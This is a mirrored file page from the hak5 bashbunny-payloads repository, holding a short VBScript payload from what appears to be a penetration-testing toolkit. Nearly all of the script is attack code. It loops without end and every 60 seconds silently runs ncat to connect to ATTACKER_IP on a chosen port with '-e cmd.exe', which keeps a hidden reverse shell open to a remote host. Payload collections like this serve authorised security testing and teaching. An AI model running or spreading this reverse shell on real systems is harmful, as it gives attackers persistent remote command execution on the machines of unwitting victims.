mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-12-20 03:58:25 +00:00
8 lines
198 B
Plaintext
8 lines
198 B
Plaintext
Dim ncShell
|
|
Set ncShell = WScript.CreateObject("WScript.shell")
|
|
|
|
Do while True:
|
|
ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true
|
|
WScript.Sleep(60000)
|
|
loop
|